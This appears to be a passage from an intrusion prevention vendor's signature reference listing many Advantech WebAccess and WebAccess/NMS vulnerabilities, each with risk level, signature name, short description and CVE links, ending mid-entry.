First detected in: sgpkg-ips-1072-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Directory Traversal
Description: There has been reported a directory traversal vulnerability in Advantech WebAccess NMS. A remote attacker can exploit this vulnerability by sending a crafted request to the target server. Successful exploitation might result in arbitrary file read.
Situation: HTTP_CRL-Advantech-WebAccess-NMS-Downloadaction-Directory-Traversal
References:
CVE-2018-7503
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7503
Back to top

Advantech-WebAccess-NMS-Fwupgradeaction-Arbitrary-File-Upload

About this vulnerability: A vulnerability in Advantech WebAccess/NMS
Risk: High
First detected in: sgpkg-ips-1288-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Input Validation
Description: An arbitrary file upload vulnerability has been reported in Advantech WebAccess NMS. The vulnerability is due to insufficient input validation on file paths while processing the calls to FwUpgradeAction.action endpoint. A remote, unauthenticated attacker can exploit this vulnerability by submitting a crafted request to the target server. Successful exploitation could lead to arbitrary code execution under the security context of the SYSTEM.
Situation: HTTP_CS-Advantech-WebAccess-NMS-Fwupgradeaction-Arbitrary-File-Upload
References:
CVE-2020-10621
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10621
Back to top

Advantech-WebAccess-NMS-LicenseImportAction-Arbitrary-File-Upload

About this vulnerability: A vulnerability in Advantech WebAccess NMS
Risk: High
First detected in: sgpkg-ips-1291-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Input Validation
Description: There exists a vulnerability in Advantech WebAccess NMS, versions before 3.0.2, which allows remote attackers to execute arbitrary code by sending a crafted request to the target system, due to the insufficient validation of file paths while processing the calls to the licenseImportAction.action endpoint.
Situation: HTTP_CS-Advantech-WebAccess-NMS-LicenseImportAction-Arbitrary-File-Upload
References:
CVE-2020-10621
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10621
Back to top

Advantech-WebAccess-NMS-ProfileResource-importFile-Arbitrary-File-Upload

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: High
First detected in: sgpkg-ips-1276-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Directory Traversal
Description: There exists a vulnerability in Advantech WebAccess NMS, versions prior to 3.0.2, which allows remote attackers to execute arbitrary code by submitting a crafted request, due to the insufficient input validation on the file paths sent to the importFile endpoint.
Situation: HTTP_CS-Advantech-WebAccess-NMS-ProfileResource-importFile-Arbitrary-File-Upload
References:
CVE-2020-10621
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10621
Back to top

Advantech-WebAccess-NMS-saveBackgroundAction-Directory-Traversal

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: High
First detected in: sgpkg-ips-1294-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Directory Traversal
Description: There exists a vulnerability in Advantech WebAccess NMS, versions prior to 3.0.2, which allows remote attackers to cause a denial of service condition by sending a crafted request to the target server, due to the insufficient input validation on file paths to the saveBackground.action endpoint.
Situation: HTTP_CS-Advantech-WebAccess-NMS-saveBackgroundAction-Directory-Traversal
References:
CVE-2020-10619
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10619
Back to top

Advantech-WebAccess-NMS-Supportdeviceaddaction-Arbitrary-File-Upload

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-1262-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Input Validation
Description: Insufficient input validation causes a file upload vulnerability in Advantech WebAccess NMS. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: File-Member-Name_Advantech-WebAccess-NMS-Supportdeviceaddaction-Arbitrary-File-Upload
References:
CVE-2020-10621
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10621
Back to top

Advantech-WebAccess-Node-Chklogin2-SQL-Injection

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-1059-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Input Validation
Description: Insufficient input validation causes an SQL injection vulnerability in Advantech WebAccess. A successful exploit allows an attacker to do database operations on the target.
Situation: HTTP_CRL-Advantech-WebAccess-Node-Chklogin2-SQL-Injection
References:
CVE-2018-5443
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5443
Back to top

Advantech-WebAccess-Node-Webvrpcs-Uninstallwa-Denial-Of-Service

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-1163-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Malfunction
Description: There has been reported a denial-of-service vulnerability in Advantech WebAccess. This vulnerability could be exploited by remote attacker causing denial-of-service conditions on the target server.
Situation: MSRPC-TCP_Advantech-WebAccess-Node-Webvrpcs-Uninstallwa-Denial-Of-Service
References:
CVE-2019-6554
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6554
Back to top

Advantech-WebAccess-Rmtemplate.aspx-SQL-Injection

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-989-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Input Validation
Description: Insufficient validation of HTTP requests causes an SQL injection vulnerability in Advantech WebAccess. A successful attack allows arbitrary SQL to be perfomed remotely without authentication.
Situation: HTTP_CRL-Advantech-WebAccess-Rmtemplate-SQL-Injection
References:
CVE-2017-12710
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12710
Back to top

Advantech-WebAccess-Scada-Bwdlgpup-Arbitrary-File-Deletion

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-1194-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Directory Traversal
Description: Improper handling of user-sent data in RPC requests causes a file deletion vulnerability in Advantech WebAccess. A successful exploit allows an attacker to delete arbitray files with administrator privileges.
Situation: MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Bwdlgpup-Arbitrary-File-Deletion
References:
CVE-2019-13552
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13552
Back to top

Advantech-WebAccess-Scada-Bwdraw-Out-Of-Bounds-Write

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: High
First detected in: sgpkg-ips-1215-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Malfunction
Description: An out-of-bounds write vulnerability exists in Advantech WebAccess. The vulnerability is due to a lack of boundary checks while processing input data in bwdraw.exe. A remote, unauthenticated attacker could exploit this vulnerability by sending a maliciously crafted RPC request to the target server. Successful exploitation could lead to arbitrary code execution under context of Administrator.
Situation: MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Bwdraw-Out-Of-Bounds-Write
References:
CVE-2019-10987
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10987
Back to top

Advantech-WebAccess-Scada-Bwgetval-Arbitrary-File-Deletion

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-1193-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Directory Traversal
Description: Improper handling of user-sent data in RPC requests causes a file deletion vulnerability in Advantech WebAccess. A successful exploit allows an attacker to delete arbitray files with administrator privileges.
Situation: MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Bwgetval-Arbitrary-File-Deletion
References:
CVE-2019-13552
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13552
Back to top

Advantech-WebAccess-Scada-Bwmail-Stack-Based-Buffer-Overflow

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-1178-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Buffer Overflow
Description: Improper handling of user-sent data in RPC requests causes a stack-based buffer overflow vulnerability. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Bwmail-Stack-Based-Buffer-Overflow
References:
CVE-2019-10991
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10991
Back to top

Advantech-WebAccess-Scada-Bwmainleft-Cross-Site-Scripting

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-1116-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Input Validation
Description: Improper handling of user-sent data in HTTP requests causes a cross-site scripting vulnerability in Advantech WebAccess. A successful exploit allows an attacker to run scripts in the user's web browser.
Situation: HTTP_CRL-Advantech-WebAccess-Scada-Bwmainleft-Cross-Site-Scripting
References:
CVE-2018-15707
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15707
Back to top

Advantech-WebAccess-Scada-Bwmakdir-Stack-Based-Buffer-Overflow

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-1106-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Input Validation
Description: Improper handling of user-sent data in RPC requests causes a stack-based buffer overflow vulnerability- A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Bwmakdir-Stack-Based-Buffer-Overflow
References:
CVE-2018-7499
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7499
Back to top

Advantech-WebAccess-Scada-Bwnodeip-Stack-Based-Buffer-Overflow

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-1112-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Buffer Overflow
Description: Improper handling of user-sent data in RPC requests causes a stack-based buffer overflow vulnerability- A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Bwnodeip-Stack-Based-Buffer-Overflow
References:
CVE-2018-14816
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14816
Back to top

Advantech-WebAccess-SCADA-Bwocxrun.ocx-Command-Execution

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-579-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Input Validation
Description: A command execution vulnerability exists in Advantech WebAccess SCADA software. This is due to insufficient input validation on the first parameter of the CreateProcess function of the bwocxrun.ocx ActiveX control. A remote, unauthenticated attacker could exploit this vulnerability by enticing a vulnerable user to open a crafted web page. Successful exploitation could lead to OS command execution within the security context of the user.
Situation: File-Text_Advantech-WebAccess-SCADA-Bwocxrun.ocx-Command-Execution
References:
CVE-2014-0773
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0773
BID-66742
http://www.securityfocus.com/bid/66742
OSVDB-105571
http://www.osvdb.org/105571
Back to top

Advantech-WebAccess-Scada-Bwopcbs-Stack-Based-Buffer-Overflow

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-1213-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Buffer Overflow
Description: A stack-based buffer overflow vulnerability has been reported in Advantech WebAccess. The vulnerability is due to a lack of boundary checks while copying user-supplied data into a stack-based buffer within BwOpcBs.exe. A remote, unauthenticated attacker could exploit this vulnerability by sending a maliciously crafted RPC request to the target server. Successful exploitation could lead to arbitrary code execution in the security context of Administrator.
Situation: MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Bwopcbs-Stack-Based-Buffer-Overflow
Back to top

Advantech-WebAccess-Scada-Bwpalarm-IOCTL-70022-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-1240-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Buffer Overflow
Description: Improper handling of user-sent data in RPC requests causes a heap-based buffer overflow vulnerability. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Bwpalarm-IOCTL-70022-Heap-Buffer-Overflow
Back to top

Advantech-WebAccess-Scada-Bwpalarm-IOCTL-70533-Stack-Based-Buffer-Overflow

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: High
First detected in: sgpkg-ips-1213-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Buffer Overflow
Description: A stack-based buffer overflow vulnerability has been reported in the webvrpcs service of Advantech WebAccess. The vulnerability is due to a lack of boundary checks while copying user-supplied data into a stack-based buffer within the LogInfoFormat function in BwPAlarm.dll. A remote, unauthenticated attacker could exploit this vulnerability by sending a maliciously crafted RPC request to the target server. Successful exploitation could lead to arbitrary code execution under context of Administrator.
Situation: MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Bwpalarm-IOCTL-70533-Stack-Based-Buffer-Overflow
References:
CVE-2019-3951
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3951
Back to top

Advantech-WebAccess-Scada-Bwpalarm-IOCTL-70538-Stack-Based-Buffer-Overflow

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-1183-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Buffer Overflow
Description: Improper handling of user-sent data in RPC requests causes a stack-based buffer overflow vulnerability. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Bwpalarm-IOCTL-70538-Stack-Based-Buffer-Overflow
References:
CVE-2019-10991
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10991
Back to top

Advantech-WebAccess-Scada-Bwpalarm-IOCTL-70603-Stack-Based-Buffer-Overflow

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-1193-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Buffer Overflow
Description: Improper handling of user-sent data in RPC requests causes a stack-based buffer overflow vulnerability. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Bwpalarm-IOCTL-70603-Stack-Based-Buffer-Overflow
References:
CVE-2019-3975
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3975
Back to top

Advantech-WebAccess-Scada-Bwpalarm-IOCTL-70605-Stack-Based-Buffer-Overflow

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-1179-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Buffer Overflow
Description: Improper handling of user-sent data in RPC requests causes a stack-based buffer overflow vulnerability. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Bwpalarm-IOCTL-70605-Stack-Based-Buffer-Overflow
References:
CVE-2019-10991
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10991
Back to top

Advantech-WebAccess-Scada-Bwpalarm.dll-Stack-Based-Buffer-Overflow

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-1125-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Buffer Overflow
Description: Lack of proper boundary checks while copying user-supplied data into a buffer within BwPAlarm.dll causes a stack-based buffer overflow vulnerability in Advantech WebAceess. A successful exploit allows an attacker to execute arbitrary code on the target system with Administrator privileges.
Situation: MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Bwpalarm.dll-Stack-Based-Buffer-Overflow
References:
CVE-2018-18999
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18999
Back to top

Advantech-WebAccess-Scada-Bwpslinkzip-Stack-Based-Buffer-Overflow

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-1108-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Buffer Overflow
Description: Improper handling of user-sent data in RPC requests causes a stack-Based buffer overflow vulnerability- A successful exploit allows an attacker to execute arbitrary code on the target system
Situation: MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Bwpslinkzip-Stack-Based-Buffer-Overflow
References:
CVE-2018-7499
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7499
Back to top

Advantech-WebAccess-Scada-Bwrunmie.exe-Policy-Bypass

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-1209-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Malfunction
Description: Improper handling of user-sent data in RPC requests causes an integer overflow vulnerability in Advantech WebAccess. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Bwrunmie.exe-Policy-Bypass
References:
CVE-2019-13552
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13552
Back to top

Advantech-WebAccess-Scada-Bwrunrpt.exe-Stack-Based-Buffer-Overflow

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-1206-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Buffer Overflow
Description: Improper handling of user-sent data in RPC requests causes a stack-based buffer overflow vulnerability. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Bwrunrpt.exe-Stack-Based-Buffer-Overflow
References:
CVE-2019-13556
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13556
Back to top

Advantech-WebAccess-Scada-Bwscrp.exe-Stack-Based-Buffer-Overflow

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-1208-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Buffer Overflow
Description: Improper handling of user-sent data in RPC requests causes a stack-based buffer overflow vulnerability. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Bwscrp.exe-Stack-Based-Buffer-Overflow
References:
CVE-2019-10991
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10991
Back to top

Advantech-WebAccess-SCADA-bwstwww-Stack-Based-Buffer-Overflow

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: High
First detected in: sgpkg-ips-1153-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Buffer Overflow
Description: A stack based buffer overflow vulnerability in Advantech WebAccess which allows remote attackers to execute arbitrary code by sending a maliciously crafted RPC request, due to the lack of boundary checks while copying user-supplied data into a buffer within bwstwww.exe.
Situation: MSRPC-TCP_CPS-Advantech-WebAccess-SCADA-bwstwww-Stack-Based-Buffer-Overflow
References:
CVE-2019-6550
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6550
Back to top

Advantech-WebAccess-SCADA-Bwthinfl-Stack-Based-Buffer-Overflow

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: High
First detected in: sgpkg-ips-1189-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Buffer Overflow
Description: A stack based buffer overflow vulnerability in Advantech WebAccess which allows remote attackers to execute arbitrary code by sending a maliciously crafted RPC request, due to the lack of boundary checks while copying user-supplied data into a buffer within bwthinfl.exe.
Situation: MSRPC-TCP_Advantech-WebAccess-SCADA-Bwthinfl-Stack-Based-Buffer-Overflow
References:
CVE-2019-6550
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6550
Back to top

Advantech-WebAccess-Scada-Certupdate.asp-Filename-Directory-Traversal

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-1045-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Input Validation
Description: Insufficient validation of HTTP requests causes a directory traversal vulnerability in Advantech WebAccess. A successful attack allows arbitrary code execution on the target system.
Situation: HTTP_CSH-Advantech-WebAccess-Scada-Certupdate.asp-Filename-Directory-Traversal
References:
CVE-2018-5445
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5445
Back to top

Advantech-WebAccess-Scada-Giffconv-Stack-Based-Buffer-Overflow

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-1156-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Buffer Overflow
Description: A lack of boundary checks while copying request data into a stack-based buffer within giffconv.exe causes a buffer overflow vulnerability in Advantech WebAccess. A successful exploit may allow an attacker to execute arbitrary code on the target system.
Situation: MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Giffconv-Stack-Based-Buffer-Overflow
References:
CVE-2019-6550
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6550
Back to top

Advantech-WebAccess-Scada-Gmicons-Picfile-Arbitrary-File-Upload

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-1048-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Input Validation
Description: Insufficient validation of request parameters causes a file upload vulnerability in Advantech WebAccess. A successful exploit allows arbitrary code to be executed with the privileges of the server process.
Situation: HTTP_CS-Advantech-WebAccess-Scada-Gmicons-Picfile-Arbitrary-File-Upload
References:
CVE-2017-16736
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16736
Back to top

Advantech-WebAccess-Scada-IOCTL-10001-Bwflapp.exe-Arbitrary-File-Deletion

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-1248-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Directory Traversal
Description: Improper handling of user-sent data in RPC requests causes a heap-based buffer overflow vulnerability. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: MSRPC-TCP_CPS-Advantech-WebAccess-Scada-IOCTL-10001-Bwflapp.exe-Arbitrary-File-Deletion
Back to top

Advantech-WebAccess-Scada-IOCTL-10001-Bwpfile-Arbitrary-File-Deletion

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-1252-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Directory Traversal
Description: Improper validation of paths in requests causes an arbitrary file deletion vulnerability in Advantech WebAccess. A successful exploit allows an attacker to delete arbitrary files on the target system.
Situation: MSRPC-TCP_CPS-Advantech-WebAccess-Scada-IOCTL-10001-Bwpfile-Arbitrary-File-Deletion
Back to top

Advantech-WebAccess-SCADA-IOCTL-10001-Bwpslink.exe-Arbitrary-File-Deletion

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: High
First detected in: sgpkg-ips-1257-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Directory Traversal
Description: An arbitrary file deletion vulnerability has been reported in Advantech WebAccess. The vulnerability is due to insufficient validation on user supplied paths before using them in file operations within BwPSLink.exe. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the target system. Successful exploitation results in the deletion of arbitrary files from the target system under the context of Administrator user.
Situation: MSRPC-TCP_CPS-Advantech-WebAccess-SCADA-IOCTL-10001-Bwpslink.exe-Arbitrary-File-Deletion
Back to top

Advantech-WebAccess-Scada-IOCTL-10012-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-1173-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Buffer Overflow
Description: Improper handling of user-sent data in RPC requests causes a stack-based buffer overflow vulnerability. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: MSRPC-TCP_CPS-Advantech-WebAccess-Scada-IOCTL-10012-Stack-Buffer-Overflow
References:
CVE-2019-3953
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3953
Back to top

Advantech-WebAccess-Scada-IOCTL-10040-Arbitrary-File-Deletion

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-1246-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Directory Traversal
Description: Improper handling of user-sent data in RPC requests causes a heap-based buffer overflow vulnerability. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: MSRPC-TCP_CPS-Advantech-WebAccess-Scada-IOCTL-10040-Arbitrary-File-Deletion
Back to top

Advantech-WebAccess-Scada-Jpegconv-Stack-Based-Buffer-Overflow

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-1185-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Buffer Overflow
Description: Improper boundary checks when processing user-sent data in RPC requests causes a stack-based buffer overflow vulnerability. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Jpegconv-Stack-Based-Buffer-Overflow
References:
CVE-2019-6550
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6550
Back to top

Advantech-WebAccess-Scada-Notify2-Stack-Based-Buffer-Overflow

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-1110-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Buffer Overflow
Description: Improper handling of user-sent data in RPC requests causes a stack-based buffer overflow vulnerability om Advantech WebAccess. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Notify2-Stack-Based-Buffer-Overflow
References:
CVE-2018-7499
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7499
Back to top

Advantech-WebAccess-SCADA-Password-Parameter-Buffer-Overflow

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: High
First detected in: sgpkg-ips-604-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Buffer Overflow
Description: A stack buffer overflow exists in Advantech's WebAccess SCADA software. The vulnerability is due to insufficient input validation of the Password parameter in an ActiveX control that is part of the WebAccess Client. A remote, unauthenticated attacker could exploit this vulnerability by enticing a vulnerable user to open a crafted web page. Successful exploitation could lead to code execution in the context of the target user.
Situation: File-Text_Advantech-WebAccess-SCADA-Password-Parameter-Buffer-Overflow
References:
CVE-2014-0992
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0992
BID-69538
http://www.securityfocus.com/bid/69538
OSVDB-110687
http://www.osvdb.org/110687
Back to top

Advantech-WebAccess-SCADA-Projectname-Parameter-Buffer-Overflow

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: High
First detected in: sgpkg-ips-604-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Buffer Overflow
Description: A stack buffer overflow exists in Advantech's WebAccess SCADA software. The vulnerability is due to insufficient input validation of the ProjectName parameter contained in the webvact.ocx ActiveX control, a part of the WebAccess Client. A remote, unauthenticated attacker could exploit this vulnerability by enticing a vulnerable user to open a crafted web page. Successful exploitation could lead to code execution in the context of the target user.
Situation: File-Text_Advantech-WebAccess-SCADA-Projectname-Parameter-Buffer-Overflow
References:
CVE-2014-0991
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0991
BID-69536
http://www.securityfocus.com/bid/69536
OSVDB-110686
http://www.osvdb.org/110686
Back to top

Advantech-WebAccess-Scada-Wadashboard-Readfile-Directory-Traversal

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-1117-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Directory Traversal
Description: There has been reported a directory traversal vulnerability in Advantech WebAccess. Due to an insufficient validation of user input, a remote attacker can read arbitrary file content on the target server.
Situation: HTTP_CSU-Advantech-WebAccess-Scada-Wadashboard-Readfile-Directory-Traversal
References:
CVE-2018-15706
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15706
Back to top

Advantech-WebAccess-Scada-Wadashboard-Writefile-Arbitrary-File-Overwrite

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Directory Traversal
Description: Improper input validation causes an arbitrary file overwrite vulnerability in Advantech WebAccess. A successful exploit allows an attacker to overwrite arbitrary files on the target system, allowing them to run arbitrary code.
Situation: HTTP_CRL-Advantech-WebAccess-Scada-Wadashboard-Writefile-Arbitrary-File-Overwrite
References:
CVE-2018-15705
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15705
Back to top

Advantech-WebAccess-SCADA-Webeye.ocx-IP_Addr-Parameter-Buffer-Overflow

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
